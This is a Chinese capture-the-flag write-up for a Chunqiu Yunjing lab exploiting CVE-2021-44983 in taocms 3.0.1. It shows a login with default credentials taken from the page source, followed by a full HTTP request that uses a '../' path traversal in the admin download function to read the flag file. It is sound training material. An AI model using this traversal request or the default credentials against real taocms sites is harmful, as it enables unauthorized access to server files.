声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

靶场介绍

taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞

http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/

 点击管理

http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/admin/admin.php?action=frame&ctrl=login

查看源代码可以获取到默认账号密码

账号admin 密码tao 登录进入后台

后台文件管理处

抓包点击下载index.php

修改为../../../../../../../flag

GET /admin/admin.php?action=file&ctrl=download&path=../../../../../../../flag HTTP/1.1
Host: eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168735,1669356938,1669368228,1669611172; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669631036; PHPSESSID=ot8ji1hpq0uqgfpta31eqoinq3
Upgrade-Insecure-Requests: 1

成功获取到flag

flag{e2cf02c9-d731-435d-a538-aaf910dd5cd9}

[春秋云镜]CVE-2021-44983相关推荐

  1. 春秋云镜wp day1

    春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...

  2. 春秋云镜 CVE-2022-24223

    春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...

  3. [春秋云镜]CVE-2022-23134

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...

  4. [春秋云镜]CVE-2020-19960,CVE-2020-19961

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...

  5. 【春秋云镜 CVE-2022-30887wp】

    春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...

  6. [春秋云镜]CVE-2022-23043

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zenario CMS 9.2 文件上传 ...

  7. [春秋云镜]CVE-2022-2073

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...

  8. [春秋云镜]CVE-2022-24263

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Hospital Management ...

  9. 春秋云镜 CVE-2022-24112

    春秋云镜 CVE-2022-24112 Apache APISIX batch-requests SSRF RCE 漏洞 靶标介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云 ...

  10. 春秋云镜 CVE-2022-22947

    春秋云镜 CVE-2022-22947 Spring Cloud Gateway spel 远程代码执行 靶标介绍 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-2294 ...

最新文章

  1. 一份火爆全网的刷题笔记分享!offer 到手!
  2. 【GoldenGate】使用OGG,两个Oracle库之间单向同步数据
  3. poj 3101 Astronomy (java 分数的最小公倍数 gcd)
  4. Python单元测试之pytest
  5. 关于make_work_guard猜想
  6. 你真的了解JavaScript的Promise吗?
  7. python web实战视频教程_Python Web开发实战【中级班】
  8. [转载] java调用c++的dll及java.lang.UnsatisfiedLinkError解决方法
  9. 项目需求:基于微信平台的拼团活动系统
  10. jitpack发布_JitPack –发布您的Android库
  11. Uva 1588.Kickdown
  12. MySQL—SQL优化笔记整理
  13. Android创建本地文件时没有权限的怪现象
  14. 埃加洛尔虚拟服务器,致我终将逝去的二区:新一轮大服务器实装
  15. 电视机顶盒CM311-1A-YST基于openwrt搭建pptpipsec服务器
  16. 固定资产拆分比例怎么计算_固定资产折旧的计算方法
  17. 2022年9月电子学会Python等级考试试卷(五级)答案解析
  18. 从Spring源码探究IOC初始化流程
  19. DrawIO怎么画出卡通效果的图?
  20. 计算机发展史资料简介,计算机发展史简介

热门文章

  1. 苹果原壁纸高清_30张美女手机高清壁纸苹果手机安卓手机通用
  2. centos 服务自启动管理
  3. 豆瓣FM duilib版
  4. 摩拜路演竟然都在用他做的PPT,这位骨灰级大神到底有什么秘诀?
  5. 《Undocumented Windows 2000 Secrets》翻译 --- 第四章(6)
  6. 霍常亮app淘宝客开发视频教程第5节
  7. 顶级技术公司的CEO是如何看待AI的?
  8. [LeetCode Python3]77. Combinations回溯
  9. 移动端UI框架小汇总
  10. SAP 成本中心 冻结而不能直接对 记帐